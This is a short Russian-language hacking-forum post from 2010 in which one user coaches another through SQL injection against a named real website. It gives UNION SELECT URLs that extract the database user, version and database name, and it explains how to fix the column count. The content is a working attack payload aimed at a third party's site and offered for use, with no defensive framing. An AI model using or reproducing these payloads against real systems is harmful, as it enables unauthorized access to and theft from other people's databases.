14.02.2010, 17:46
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
CyberHunter
при запросе
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7+--
Выводится тек.юзер, версия БД и имя бд.
а при запросе:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 --
выводится принтабельное поле, точнее при это запросе ничего не выводится,т.к. не правильно подобраны столбцы. Добавь еще .....5,6,7--
П.С, вот хорошая статья: http://forum.antichat.ru/thread104591.html
Последний раз редактировалось jecka3000; 14.02.2010 в 17:53..
|
|
|